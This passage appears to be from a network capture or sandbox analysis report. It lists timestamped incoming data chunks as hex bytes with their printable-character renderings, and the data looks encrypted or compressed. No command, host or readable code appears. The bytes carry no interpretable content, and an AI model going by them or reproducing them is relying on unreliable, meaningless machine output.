                            2023-03-13 13:10:20 UTC40INData Raw: b4 01 0e 21 66 45 06 5b e3 fe 79 1a 88 cf 14 34 51 08 63 55 48 0e 0e 02 ac f3 23 c7 19 2f a0 19 5b ee c4 e3 86 e7 b9 2e f2 60 e1 52 23 b3 e5 aa 2f c1 ab d8 43 7e 76 4c 56 51 0f 5e e9 82 bf 5e 44 c3 01 e5 3c 3a 59 d3 ae 89 10 35 03 f3 19 df 46 82 c1 d3 ba cd 10 1d d9 a6 fb b9 8f 5b a8 ac cd b4 39 86 ca 69 94 bc bc 23 2d 69 1b 3a db 4a e3 fe 2a ef 2f bf 66 db 98 06 4c 89 eb ea 0e 8d 4d 16 45 40 b8 90 69 99 54 c0 2d 6c 32 62 82 ea a2 aa d7 a6 20 13 d7 70 6f 57 da 64 b9 3c a3 b4 38 b3 97 18 e8 ed bf 1d eb e1 8e 90 6b ec fa 98 e3 36 bb 30 46 ef 46 1f f9 66 f9 7c f7 ee 8c 1d ce 8a 00 a1 42 39 d8 20 f6 bb 7d b2 70 1a e8 60 05 28 cc 84 27 14 b5 eb 99 72 a7 62 7c d4 ee cd be f1 e8 c4 ea 6c b3 11 7d 81 2f c0 b4 97 86 38 02 46 3b e0 71 38 9e 12 8f 61 40 c1 c6 10 66
                            Data Ascii: !fE[y4QcUH#/[.`R#/C~vLVQ^^D<:Y5F[9i#-i:J*/fLME@iT-l2b poWd<8k60FFf|B9 }p`('rb|l}/8F;q8a@f
                            2023-03-13 13:10:20 UTC41INData Raw: 78 2e 66 bd 97 ed 17 e6 69 1b 24 43 f6 31 8e cb 56 18 9f b7 ce 30 13 eb 0a ec f9 10 d5 07 8c 3a 21 9d fe 14 5b 6f 52 ca 88 66 e9 9a 4a 69 ae 61 36 90 5a 15 a0 d9 fb 7f 15 73 bd c1 e0 c5 5c 83 c0 4a da a7 4c 51 2a 28 14 00 17 11 e4 07 ce c0 99 3e bb 18 0a 07 e5 f6 97 2f 49 51 ca a8 c7 22 dc b2 d3 ce d2 a9 04 aa 03 d9 01 8c fb 95 68 a1 95 7b 62 12 05 ff 65 71 6f 9e 3d a3 7f 45 b5 c3 46 f2 19 9a 4b ea b4 fc ea d4 69 8e 83 b7 cc 53 16 2e b1 35 90 2c d2 9a f7 a1 77 c7 e7 9c ff 9d 5b 24 dd e6 ac 36 5c bb 55 8f 74 3c d8 e2 e8 97 f6 ed 39 61 4f 83 6b 94 51 77 b5 53 55 1b d8 56 42 d4 53 0e 79 6c a0 a2 27 28 6f a3 01 2e 80 55 81 81 50 ef 4b 68 8b be d3 dc 22 24 4f 09 a5 64 b6 3e 7d e2 59 7b 3d 0b d9 07 44 08 12 28 cb 3e 89 7b eb 91 d9 2a 9f 90 97 f4 a9 54 ac 6d 95
                            Data Ascii: x.fi$C1V0:![oRfJia6Zs\JLQ*(>/IQ"h{beqo=EFKiS.5,w[$6\Ut<9aOkQwSUVBSyl'(o.UPKh"$Od>}Y{=D(>{*Tm
                            2023-03-13 13:10:20 UTC42INData Raw: 06 36 f1 2c d8 f6 2a e3 af 5b f9 dd fb 83 e7 b7 12 af d0 6f 57 20 db df c6 d6 51 e0 d0 50 73 4c 13 4f 6c 68 e9 58 20 a9 71 38 c9 9b ee 5a a6 67 d3 a4 ae 06 27 04 d3 9e 7d e0 94 ed ad b1 db 05 78 55 b1 fa b3 a2 61 b0 b8 e7 42 9b 21 be 37 f8 be ba 36 44 cc 1e 1a b7 e9 59 e8 07 a2 5a 0e c2 b3 da 6b 4e 83 c1 c9 ab 8b 5c 19 48 36 eb 2b 6c b1 39 e2 a4 24 4f da 24 25 a7 82 bc b7 26 66 89 77 6d 51 cf 43 84 b5 10 b6 30 9c 24 ba e9 d4 d7 3f c8 69 43 23 43 81 f2 f7 dd 16 b5 b4 34 e5 6e 72 fa 4e d5 54 f1 e6 a4 00 e7 ac 0a 8c 7f 5e b6 24 d6 e8 dd 15 57 2a 0b c0 02 06 ce 32 27 12 d0 f5 90 72 ad 55 31 f3 e8 dc b1 c6 9b 6d 48 6b 9a 6f 6f 90 39 f6 66 32 91 3f 2a 21 a4 f1 67 7f af 10 8f 6d 04 95 d6 15 40 04 19 54 b6 92 07 d7 a7 4d cd 30 32 b6 f8 f9 b0 3c 6b 74 d5 83 a7 42
                            Data Ascii: 6,*[oW QPsLOlhX q8Zg'}xUaB!76DYZkN\H6+l9$O$%&fwmQC0$?iC#C4nrNT^$W*2'rU1mHkoo9f2?*!gm@TM02<ktB
                            2023-03-13 13:10:20 UTC43INData Raw: e0 02 cc 85 4b a2 ff a4 5d 0b b6 f8 07 58 6d 55 56 f1 64 ec de 4e 78 a4 7c 1c 04 50 04 a3 49 eb 6e 1f e3 b0 96 a9 26 d0 a7 ca 9a c3 8f 93 50 02 08 07 09 0c 33 a3 37 10 db fa 4c 93 38 3a 03 ef 36 9a 51 0c 18 ca a2 c5 25 c3 9a 05 dc c3 81 26 a3 14 21 13 ac e1 9b dc a4 80 45 d7 04 16 ed 03 39 6f 97 2b 4e 6d 78 af e5 51 a8 94 85 59 f8 a7 e4 df ff 69 87 9a a8 3e 43 36 11 ff 1d 8f 21 ce 89 ed ab 98 d4 dd a7 e9 b8 44 2d c7 f5 b0 14 8e b8 79 89 63 3f 90 e1 db b1 f6 e4 2c 78 a7 aa cc 93 59 6a f3 6c 53 02 c1 7e 79 cb 58 fa 69 49 8f f7 21 19 6e d6 55 50 e2 5c 9e 82 bd fa 4c 79 9e a2 f9 9d b3 b8 5a 12 a1 4c e2 27 83 e9 2d 61 4f 60 4f 0a 44 0b 19 c2 b4 57 81 79 6f eb d9 62 83 e6 a2 f4 a0 45 72 56 09 ff 32 91 dc 60 b3 ab 51 8a 4a 05 e8 8c 09 bf 8b c0 2e 51 26 3f 68 a2
                            Data Ascii: K]XmUVdNx|PIn&P37L8:6Q%&!E9o+NmxQYi>C6!D-yc?,xYjlS~yXiI!nUP\LyZL'-aO`ODWyobErV2`QJ.Q&?h
                            2023-03-13 13:10:20 UTC45INData Raw: fd 84 66 9c 53 f8 3d 7b 60 59 76 63 48 5f e3 aa 0c 59 55 c1 b7 f5 24 14 76 d4 8e 8f 8e 94 06 db 72 ce 42 95 ed ca b3 db 09 3f 47 b1 fa b3 e0 eb a1 bd cd 3f 2f ec ba 1e 95 b6 ab 36 44 7b 1f 1a b7 9c 56 d6 0a 84 3e a4 bd 81 f6 06 4c f0 63 a6 1f 81 4f 1b 74 36 59 91 6e b1 33 d1 31 41 2b 30 10 60 00 82 ba ae 33 1c ee 7f 4d a1 69 e6 92 9a 6c b1 10 d8 bd 12 ee fc b0 15 c3 6f 2c 9d 6f 99 e9 90 f4 1f 95 66 51 4a 69 5a 96 64 ff 52 d9 e6 8c 1b ec c3 ab a1 48 5c b5 3d de 17 6c b7 5a 2f d8 1c 0c 12 bd 78 31 1a da 81 82 1d b5 4e 5e cf 34 cd bd be b5 49 48 61 88 61 54 b8 3b fd 58 bf 24 3f 20 38 33 f1 7d 30 22 a5 2d 60 07 d7 c5 10 66 04 a2 f6 b1 b0 42 de a7 4b a8 a8 2a a7 fa 9c b7 1c ed c0 60 09 ab 2f 4f 7b 35 9b 1e 33 12 0e 50 4b ff 1e b5 6d 56 20 05 c3 54 57 c2 9e bd
                            Data Ascii: fS={`YvcH_YU$vrB?G?/6D{V>LcOt6Yn31A+0`3Milo,ofQJiZdRH\=lZ/x1N^4IHaaT;X$? 83}0"-`fBK*`/O{53PKmV TW
                            2023-03-13 13:10:20 UTC46INData Raw: a4 76 6f 83 50 04 a9 c8 f3 6e 1f c6 a2 9b 81 70 d5 a7 c0 c2 de 8f 93 52 2a 22 07 08 06 1b ff 2c 20 d7 90 da ba 0b 3a 4c e5 25 86 39 5a 16 e1 84 d6 25 df 9d ed cf fe a7 24 55 5e 7a f8 88 9d 95 e6 ce 88 5d c4 1c 05 ee 73 6a 91 96 0d 59 7e 7e ad cb 51 bb 9a 9d b5 eb 99 f5 dc db 42 55 82 36 12 52 3a 2a 93 cf f4 20 df 9e d6 2c 89 c6 c1 92 ca 37 64 2d d0 e7 80 fc de bb 79 8d 5a b8 81 e8 f9 96 d6 f2 93 c9 b6 aa 2a 91 59 66 f2 4f 62 07 d4 56 41 c6 5a e7 4b 58 b3 a1 29 12 70 b0 2d cf 34 fe 99 a0 c3 ec 67 67 93 a6 f9 c3 b2 b8 5a 0e ab 0b a5 27 83 e9 6d 24 05 17 d5 19 41 10 0e c1 93 05 d9 f4 45 f8 ce 72 86 8f 8c e7 a7 64 73 7d bf 4c 32 ba a0 67 ab c2 d7 b3 4a 0f fd 8f 39 ba 93 d1 3c de 21 55 41 fa fa b0 c9 4f 7a ee a8 bb fc 0e c8 e4 10 06 d7 ac 8c d4 b3 f8 8a 0d 8b
                            Data Ascii: voPnpR*", :L%9Z%$U^z]sjY~~QBU6R:* ,7d-yZ*YfObVAZKX)p-4ggZ'm$AErds}L2gJ9<!UAOz
                            2023-03-13 13:10:20 UTC47INData Raw: ec 66 ff a0 92 3c 3f 6e e9 1f cc 48 a1 04 df b8 c8 06 17 f0 b4 e1 47 8e 66 a4 96 2f 32 39 86 b9 0e 90 ab 44 31 07 5a 3e 8e 09 66 46 d1 6f 80 2d b9 48 8a f2 06 46 a3 f9 12 bd 8c 74 7e 67 33 30 1a 48 b1 39 c8 27 72 01 27 0c 59 a0 98 44 a5 0c 13 e9 65 69 4c cf 41 95 a3 04 ab ee df b9 16 ce 3e f1 60 30 47 41 95 43 87 f3 81 f6 13 b5 af e1 fe 90 73 d7 62 ff 43 e2 e9 8c 0a e3 b3 0b 5f 49 7a a5 0a f3 85 6a 48 af fd 61 e8 19 30 a4 86 6e 13 da 81 cb 72 ad 5f 48 d6 e4 f7 ad d1 07 45 5e 95 9a 50 7b 81 3e f3 7c 1a 35 33 3d d5 38 cc 75 3b 9a 3b 67 78 24 37 d8 10 60 2d 8d 26 cc bb 6a d1 8f d8 a2 84 38 bc 81 a5 bc 3c 61 7e c5 61 aa 43 4d 71 35 3d 7d 31 9c 6d 67 6d e0 1e bf 7e 47 0e a7 c5 da 34 c7 0a 62 d8 b2 c1 e9 bd 48 7f 99 1c 0b 50 62 ed 6a 85 cb d3 a9 78 05 da d2 a9
                            Data Ascii: f<?nHGf/29D1Z>fFo-HFt~g30H9'r'YDeiLA>`0GACsbC_IzjHa0nr_HE^P{>|53=8u;;gx$7`-&j8<a~aCMq5=}1mgm~G4bHPbjx
                            2023-03-13 13:10:20 UTC48INData Raw: 71 b0 08 07 09 0a 06 ed 32 10 c0 95 0d 45 0a 16 05 e6 09 7b 35 5a 1d ca b9 d3 23 2f 8b 3f c4 d0 81 fa a2 14 21 0a b8 e3 92 e6 d9 87 53 29 13 29 fb 7d 6b 7c 92 21 4c 7b 77 40 c4 7d a8 bf 80 73 fd 4a 08 08 c8 6d ad 9d ab 32 52 3a 2b a6 1f cd 73 df 88 ff bf 89 c7 95 9b fc be 44 2d da e4 85 8c 19 18 7e a1 1f 29 81 ee db 80 f7 e4 20 41 af 80 3c 36 59 60 e9 75 68 12 d6 2b ee cb 58 f4 52 40 a7 aa 3a 29 60 bc d8 22 80 5c cb 88 ae ff 71 72 81 8e 14 d5 b3 b8 50 12 a5 7e 41 26 af e8 72 57 1d 13 c3 00 69 62 11 c5 c7 12 90 74 7d 06 cf 5f 8f 96 80 dc 9d 4f 52 66 99 d2 8e 1b b6 4a de af 3e b5 62 20 e2 9f 1b a6 8b c2 3b 40 21 5d 4e 5c e8 99 d1 3b 16 b6 bb b6 e7 11 ca ed 07 4e eb 62 63 d3 11 8b 18 37 a3 08 5b 56 0f 82 fb cb d9 13 ff e6 2b 8a 6c f7 a3 ae 16 7a 7d 98 32 87
                            Data Ascii: q2E{5Z#/?!S))}k|!L{w@}sJm2R:+sD-~) A<6Y`uh+XR@:)`"\qrP~A&rWibt}_ORfJ>b ;@!]N\;Nbc7[V+lz}2
                            2023-03-13 13:10:20 UTC49INData Raw: 99 b4 a0 91 c4 2e 3d 88 b9 18 8f 42 bb 1c 29 53 1c 31 1d c2 6b f9 02 99 1d ba 60 7f f3 06 4c d4 c7 a6 0e 9d 4f 1e 5d 88 37 32 6e b1 28 cf 37 94 13 0e 09 4f 8f 99 a9 a9 20 04 f2 6a 93 56 e5 a7 95 b2 01 c0 c3 df 95 1e fd f9 ac 2e ce 57 93 97 43 81 e9 9c f4 10 95 cf 5e 4a 69 5a 96 64 ff 52 9e 4d 8d 1b e0 bf 07 b0 4c 47 a1 23 d6 e3 d6 15 57 2a 0b c0 02 06 89 28 27 12 d0 ac 95 52 83 f4 fc c2 c0 b1 b9 d1 10 62 42 4b ba c6 dd 86 01 8d 72 1a 22 50 8b 2a 39 e6 64 18 89 14 9e 61 0f 8b 7d b2 67 04 c5 f4 b1 bc 05 74 a6 4b a4 97 3b 9e c7 8d bd 36 7a 70 d3 07 ab d3 4d 7b 39 bb 1d 5c c7 05 3f e6 90 28 bf 7f 41 1b a5 c4 27 2b ee 20 65 cb b3 d2 f4 95 56 4b 52 19 ad 54 48 cb 6d ea b8 d5 a1 11 3f d0 c3 ab 50 c5 3c 20 c0 48 ee 00 b9 95 8a 86 de 36 a1 e2 0a 9a de d1 ca f5 a1
                            Data Ascii: .=B)S1k`LO]72n(7O jV.WC^JiZdRMLG#W*('RbBKr"P*9da}gtK;6zpM{9\?(A'+ eVKRTHm?P< H6
                            2023-03-13 13:10:20 UTC51INData Raw: ca a2 06 39 d1 8a 12 e6 f8 a9 04 a9 3c 3c 01 a0 fa bb f6 d9 86 31 da 12 05 fe 55 82 6e 97 27 4e 7b 42 b7 d4 55 de 9d 85 4b f1 a6 f2 e6 dc 41 a0 9d bb 34 41 3c 3a b0 37 d7 21 df 90 d3 ed 8f b5 bd 98 d4 bc 57 2a c1 e1 a2 24 cd 83 78 89 78 44 bc e9 f3 90 99 9d 27 6b b7 93 40 82 5f 0f d3 5e 4a 1a ba 2b 4a cb 5e e1 7f 60 9a ea
                            Data Ascii: 9<<1Un'N{BUKA4A<:7!W*$xxD'k@_^J+J^`
                            2023-03-13 13:10:20 UTC51INData Raw: 7c e1 4c d1 0f 23 86 33 e1 89 ae e8 76 66 ac 8b 91 89 4b 90 3d 01 a8 62 d0 5c 82 e3 73 6e 11 7c 4e 0a 44 0b d4 d5 ec cc 81 71 72 a0 c2 7b 92 e6 a5 f5 a0 45 45 35 87 58 cb 46 4e 11 8b ac 3e b9 59 0d f3 97 31 7e 2d 73 31 68 5d 52 59 a4 c9 16 67 ea 6a 9e d6 be ed 0f f1 c7 07 5f ec 5b 17 6d 9f 96 2f 40 89 35 5d 7e 0f a2 6a 7a 5b 76 68 29 2e a2 07 dd 86 a8 65 46 70 82 2b e5 fe ba 4c 52 28 68 c2 78 13 06 e5 e2 d0 31 87 98 72 07 ba 66 5d ab 7a 7a 64 7a 08 27 7c 57 11 70 53 af 80 54 7c f2 ad 4e 9a 98 7b bc 87 dd b1 22 45 2e 80 73 85 58 23 e5 e1 4c ba 8c cb 8c 5d 90 51 30 b7 8a 63 53 c9 5a 15 4e 67 98 80 11 9e ee a9 90 6a 6d 7a 52 fa 06 50 11 83 c8 36 1f a1 b6 cb 7f d0 79 1f 09 aa ca 22 d1 e7 24 ac b5 e5 5b d0 c0 eb f4 b2 34 7f 57 cc 50 02 d9 ea c7 d0 34 45 d8 70
                            Data Ascii: |L#3vfK=b\sn|NDqr{EE5XFN>Y1~-s1h]RYgj_[m/@5]~jz[vh).eFp+LR(hx1rf]zzdz'|WpST|N{"E.sX#L]Q0cSZNgjmzRP6y"$[4WP4Ep
                            2023-03-13 13:10:20 UTC52INData Raw: d9 b9 c7 14 c7 21 6c 8d 13 3e 80 29 ea 56 05 34 2c 2d 2b 28 e7 68 1d 66 11 a3 6f 3e bc d4 14 7f 22 bb f1 b1 ab 6d c8 59 4a 8e 83 3b a1 aa 80 a3 2f 6c 75 d3 09 95 bc 4c 57 37 b3 03 20 15 04 2e e7 e0 0e 41 7e 67 0a 84 c6 6c 24 11 df 9c f0 4c c3 ff bf 49 9e c6 1e 85 33 60 95 69 ad c5 d4 a1 1d 2c fb 38 1f 9d b9 15 4d c4 59 e3 39 99 fb f7 81 f4 2e b2 92 b3 9d b1 aa e1 d7 a5 8e ca 97 4f 7a 02 2e 42 e5 5c e2 c0 b0 a1 67 ed 02 a0 a1 c6 39 4d 2a 04 7d e9 83 0d fb 64 26 64 79 bf 75 c0 9b 46 95 00 7f ed 67 eb 74 08 52 c8 a5 83 d3 b9 90 ca b4 11 68 29 5b ae b7 ce d5 e1 a6 ba 54 86 6b 74 19 b5 fe 9a 79 da 8d 07 fd 2d 71 e2 8d 1a 14 a5 70 1b 33 42 c9 17 6b ca a8 33 b5 66 cc 1b a7 fe 28 d7 b4 66 88 8a a5 57 23 c7 f8 07 43 68 49 48 d9 10 e2 b1 57 78 b5 7a 78 7d 51 28 a0
                            Data Ascii: !l>)V4,-+(hfo>"mYJ;/luLW7 .A~gl$LI3`i,8MY9.Oz.B\g9M*}d&dyuFgtRh)[Tkty-qp3Bk3f(fW#ChIHWxzx}Q(
                            2023-03-13 13:10:20 UTC53INData Raw: 64 bf 2d 8e e1 06 61 16 13 c9 19 40 10 0e df dc 61 b3 78 65 f2 dd 76 84 8c e9 c7 a1 4f 58 7f bf 4c 33 d6 2e 62 b3 a7 34 6d 46 14 e4 b3 16 bc 94 be 2e 40 30 5a 85 7c e5 a4 dd 64 6a a7 be d3 f5 09 d9 ea db 81 ea 6a 99 fe 3a 80 03 42 93 35 5b 5c d9 7c 60 77 57 12 d0 e4 31 8a 6a d5 5a a8 3c 70 71 82 20 be c9 bb 4e 58 b8 60 e8 87 ac a8 e2 ca bd 33 85 9e 2a 43 24 5d 5a 8f 17 78 64 7c 22 00 11 57 21 f7 78 1c 22 53 54 9f ad 4e a7 b0 0b 09 87 dd 91 21 fa 8c 99 59 93 f3 23 e3 96 50 99 8e c2 9e c3 91 51 3e 8c 9c 41 3c dc f8 12 62 20 b8 82 14 c3 a0 17 32 69 6f 09 52 81 ab 78 36 87 e2 1e 3d 52 75 c2 78 f8 10 37 17 ae 99 84 d1 e7 2a a6 3f 59 fa aa 44 86 f6 b6 18 12 63 b6 fd 08 b6 d9 ec f2 3c 57 ad fd 79 60 5b 74 77 4a 24 47 82 ae 5d 7f e9 99 eb 48 bc 67 d3 aa a9 26 34
                            Data Ascii: d-a@axevOXL3.b4mF.@0Z|djj:B5[\|`wW1jZ<pq NX`3*C$]Zxd|"W!x"STN!Y#PQ>A<b 2ioRx6=Rux7*?YDc<Wy`[twJ$G]Hg&4
                            2023-03-13 13:10:20 UTC54INData Raw: 87 19 9c 6a 2f ab ca 0f 7e d2 a9 da 97 ab 63 c4 a2 5a a8 10 23 bc ab 9c b5 2d 61 62 9b 9d da 5d 37 22 e2 3f 30 33 12 05 17 3f ff 1e b5 6c 42 17 b0 d0 59 5d fe 2d 7c cd 46 c2 d3 bf 5f fd e7 46 96 35 55 dd 78 88 c1 c5 ac 08 34 25 d3 8f 14 af 34 31 c3 4f 71 0e c9 a3 e6 81 cf 36 df f3 1b 9d bb b9 92 9a 79 8d b7 35 16 ab 8a 20 51 d5 5f ca 4b b0 a1 6d e0 0b bf ab c3 3f 66 77 09 65 fb 83 0d fb 65 26 6f df fb 6e 99 a3 7b ea ff 80 f8 71 f3 79 0f 54 3b bb bb 25 cb c7 c2 bc 0c 3a 3d 4f bb a3 db 2b f1 87 a9 ac 85 6f 5d 33 63 e6 e6 f4 da 9c 00 f2 d8 70 c9 9f e4 02 9a 7e 1b 35 44 d6 31 8f 35 85 1d 9c 48 f6 37 e8 07 fd dd 8d 49 d6 fd 8c 53 23 9d f2 05 72 fe f9 e6 e6 5d 8e b3 57 7e 8c 30 6e 83 56 2e b7 ca 88 df 1f e2 a6 b1 a3 16 d3 da 71 4a db 8b b9 51 2a 22 1c 39 02 1b
                            Data Ascii: j/~cZ#-ab]7"?03?lBY]-|F_F5Ux4%41Oq6y5 Q_Km?fwee&on{qyT;%:=O+o]3cp~5D15H7IS#r]W~0nV.qJQ*"9
                            2023-03-13 13:10:20 UTC56INData Raw: 6d a1 f7 f6 a0 49 41 6a 67 5d 24 bf 9b 62 b3 ac 2e b3 4a 05 e2 82 11 da 06 d1 39 41 30 50 58 fc eb 9d dc 48 6d bc b9 9c eb ab 7b e7 2f 32 e4 7b 9b fa 72 90 07 2b a1 2b 59 2d b6 a2 6a 74 51 36 d5 88 54 39 6a df 82 84 16 70 71 99 11 8e c9 38 4d 58 39 02 e2 0c bd b2 f1 c5 85 5a 87 9e 52 43 14 cb 4d 7d 16 54 6d 0f 5b 00 7c 5d 11 48 6b 1f 22 42 5b 86 51 4f b0 bb 76 94 8c d7 91 2b d7 c6 9d 48 e7 5a 32 ec 8a 84 ba a0 db fc 70 b9 6c 3a a6 88 63 57 d4 5a 15 4e 67 98 80 11 96 00 17 32 67 4e 0e 43 f5 00 69 39 99 36 3d 13 54 0e 43 63 eb 1b 1d 18 a3 f4 d6 d0 cb 2a 8c 0a 48 f6 d7 f9 89 ed 4c 33 20 63 e6 52 23 23 da ee 79 3e 54 da 46 51 d3 5e 5e 6f 44 57 fe 0f 8a 59 55 ca 88 e2 24 18 71 cc a4 1e 29 3c 6e cc 1f cc 48 9e cc d3 b8 cd 10 1b d9 7e fa b9 8f 5b aa ac cb b4 39
                            Data Ascii: mIAjg]$b.J9A0PXHm{/2{r++Y-jtQ6T9jpq8MX9ZRCM}Tm[|]Hk"B[QOv+HZ2pl:cWZNg2gNCi96=TCc*HL3 cR##y>TFQ^^oDWYU$q)<nH~[9
                            2023-03-13 13:10:20 UTC57INData Raw: 2e bd 3c 61 66 c6 14 90 47 4d 6a 36 a5 ea 32 3e 00 3f f7 ec 1b bf 6e 4e 12 51 c2 78 5f c4 22 48 6b 93 8b ed b1 66 54 f0 1e 8f 35 4c b8 1d 84 c1 d2 ac 1e 0e 9f 73 01 38 96 50 22 c6 5f 8a 6e b2 fa f1 8e dc 18 ed e8 1b 9b de d7 ca f5 a1 84 97 6e ee d8 01 2c 3c d7 5e e4 fb cb a0 67 f5 0b a8 df ad 33 66 60 0d 15 7d 7d 0c dd 78 24 4e fb 92 74 ca b0 86 cb 0e 6d e3 83 f6 7c 0f 45 2d cb b7 db ca e1 16 b2 31 62 30 40 ae b0 d4 2b b2 8a e1 f5 84 4d 58 18 b5 f8 ee c9 d8 8d 2e e5 26 71 80 9b e4 04 9f 60 11 0f 02 c9 01 7b 2c 57 1e 9b 44 bd 94 15 f8 08 c7 9d 70 82 ff b5 5d 34 63 f9 2b 5b 56 3b 45 e1 73 e9 a9 44 72 a4 67 65 9a ae 05 85 c3 f5 01 bc e2 a2 91 92 11 ca b4 ca 4a ca 85 85 af 2b 0e 03 09 11 08 f4 37 01 db 8a ea ba 27 38 28 e7 0e 24 17 e7 18 ca a8 c4 31 f9 2f 13
                            Data Ascii: .<afGMj62>?nNQx_"HkfT5Ls8P"_nn,<^g3f`}}x$Ntm|E-1b0@+MX.&q`{,WDp]4c+[V;EsDrgeJ+7'8($1/
                            2023-03-13 13:10:20 UTC58INData Raw: ad 92 d1 36 40 77 52 19 25 eb b6 d9 48 6d b7 a0 8c e9 09 9c e2 07 5f 81 7b 9d c3 2b 82 0b 15 1a 35 5b 56 05 b3 66 6a 85 15 fb 8d 3f 99 61 c4 95 a2 16 61 7d 9b df 8b e5 b0 4a 37 95 60 e2 06 bf ae f8 d9 b1 33 96 92 4f bd 04 e8 54 8b 3f 73 64 7c 2a 39 8a 56 1b 50 66 03 2e 53 45 93 b3 b0 9d 9c 78 ad 8d c6 9a bb f6 91 94 57 e8 4b 2f f8 6c 7b 97 84 f9 38 6b 91 51 26 b5 8e 43 56 7a ef ec 67 26 90 82 3f d8 0b 17 34 67 5d 04 5c fa 11 74 2e 7d c9 10 36 22 73 69 78 f2 1f 04 1a a0 e2 39 dd f1 d0 8d 31 5f f9 c0 fb 8a f6 a3 3e 12 9f cc 7c 0a 9d d8 fe ba c1 ab 2f 58 0a fa 5e 5e 6f 45 81 ef a4 73 dc 54 cb 9b e1 31 7d c2 d2 ae 85 01 4f 00 f3 1f b2 42 92 c5 ca a0 df 7d 17 e0 b1 f0 aa 8a 34 a1 bc c7 24 39 85 af 0c 92 84 f7 31 2b 78 17 0b ba e4 d2 59 a0 85 05 d2 62 b4 f4 69
                            Data Ascii: 6@wR%Hm_{+5[Vfj?aa}J7`3OT?sd|*9VPf.SExWK/l{8kQ&CVzg&?4g]\t.}6"six91_>|/X^^oEsT1}OB}4$91+xYbi
                            2023-03-13 13:10:20 UTC59INData Raw: 5f 1b a9 1d 54 4c e9 0a 63 d8 b8 c2 ef b5 4e f1 f0 4b 85 4e 86 cb 6d 84 c1 d4 a0 0c 1e d9 d2 ff 3f be 3d 13 c6 59 f4 07 b8 d1 cc 87 d9 29 4e e8 37 99 a5 84 d1 fe a7 8a a0 c1 4e 56 03 06 7d 27 46 e9 94 b7 b9 99 f2 2e aa b2 bf 28 66 66 0e 57 e7 64 07 d7 6d 36 98 50 be 77 c0 8a 22 15 07 65 19 7c cc 76 24 47 1d 67 87 74 ca eb c0 b6 74 d2 31 50 a4 a6 fe 98 e1 8a b2 58 5a 46 7e 0c bf 26 f5 ff f0 8c 1d e4 26 71 e5 da e4 01 dc 73 1e 25 49 c9 11 62 04 aa 1f dd 4c ce 30 7f f8 02 dd 92 70 8d c7 ff 56 23 9d f8 16 57 64 a4 45 cd 70 eb bb 4c 6b a1 76 7e 86 47 fa a8 e4 fa 1d bb e2 a2 91 8d 0c c3 a2 c0 5b de 90 9f af 2b 0e 0d 18 02 0c a6 24 14 ce 9d 07 be 0b 2b 06 fa 2e 69 2e 65 02 cc af f6 5b 76 28 14 e6 bf ab 04 a5 3c 2d 00 a0 fa f8 4d c8 82 4f c8 1e 16 fa 7d 6d 6a 8f
                            Data Ascii: _TLcNKNm?=Y)N7NV}'F.(ffWdm6Pw"e|v$Ggtt1PXZF~&&qs%IbL0pV#WdEpLkv~G[+$+.i.e[v(<-MO}mj
                            2023-03-13 13:10:20 UTC61INData Raw: c6 61 3a 70 3a b9 6a 2f 8b 33 73 5c 05 a2 60 03 e1 15 d7 8d 3a 8d 7b d8 a6 45 b0 d2 76 aa 4c 88 c9 bd 23 fd 38 60 e4 21 a4 b0 f1 d1 60 b8 83 9e 52 6b aa c4 5a 89 06 7f 72 5c d9 a6 de 50 33 3d 7a 10 24 3c f5 9e af 48 f3 00 71 bc 8d c4 99 09 55 8c 87 51 f9 5d 35 c3 5c dc 19 8b e9 8e 68 91 57 55 07 83 43 41 19 48 12 66 00 bc 91 13 af 02 78 87 6c 45 11 43 f3 11 7e 16 41 6e 9e 38 79 65 6b 78 fe 7b 77 09 ac e8 39 d7 c7 84 2a bf 5c d1 ba ea 86 f0 dd 58 0c 61 c7 30 31 30 dd c6 d0 2f 5d bf eb 78 60 59 48 06 95 5f e9 88 c1 e2 54 cb 9d fe 5a cf 67 d3 a4 ec 83 37 01 f5 08 a3 9f 93 c5 ca dc 60 02 17 e7 a7 95 64 8f 4a ab d2 7a 2f 2a 85 aa 15 84 b5 d5 8b 2a 78 18 0c d2 19 41 f9 08 ed 96 be 60 b2 e5 69 91 83 c7 ac 70 36 5d 13 63 20 3d 3a 46 45 39 c2 27 4a 44 7b 51 b0 8d
                            Data Ascii: a:p:j/3s\`:{EvL#8`!`RkZr\P3=z$<HqUQ]5\hWUCAHfxlEC~An8yekx{w9*\Xa010/]x`YH_TZg7`dJz/**xA`ip6]c =:FE9'JD{Q
                            2023-03-13 13:10:20 UTC62INData Raw: 85 c1 d4 9b 13 2e db dc a3 3f be 3d 20 c6 59 e5 11 b3 fa a0 84 de 30 ea eb 1b 9d 00 ab cb f5 a4 8d b7 3f 4e 7a 06 05 4a e5 5a e2 2d b0 a1 67 9d 02 a0 a1 c6 21 62 4d 23 7a e1 79 1b 29 6b 0c 6f 22 36 74 c0 97 23 0d 13 7b e7 6c e4 62 f1 44 1a a0 af cc d9 ef ca a5 1f 7a cf 51 82 b2 fd 29 cb 5d 94 63 22 e1 5f 30 d8 fa f5 ff a9 35 0d e4 2c 73 c5 88 42 b7 8e 5b 76 26 49 cf 38 7b 34 a9 15 9f 41 ce 30 1f d0 55 cd 84 69 e7 aa a5 57 29 91 d3 34 5a 11 bf 44 e1 7f 97 e5 57 78 a5 7d 69 81 57 6b 13 c8 f3 64 08 8d 19 9b 81 1e bf 1b c0 4a d1 af 6c f4 88 25 2f 64 04 1b f8 1f 36 d1 90 1e d4 a0 3a 03 ef 2d f8 c7 49 18 c0 85 13 ea c0 82 66 dc d2 a9 05 ae 1d 0b 06 a9 9f 8f e6 c8 88 99 09 11 23 21 7d 7a 00 3b 21 5d 74 43 be c5 51 ab 88 85 4b e8 b5 aa f7 e6 f5 87 8d bb 32 52 3a
                            Data Ascii: .?= Y0?NzJZ-g!bM#zy)ko"6t#{lbDzQ)]c"_05,sB[v&I8{4A0UiW)4ZDWx}iWkdJl%/d6:-If#!}z;!]tCQK2R:
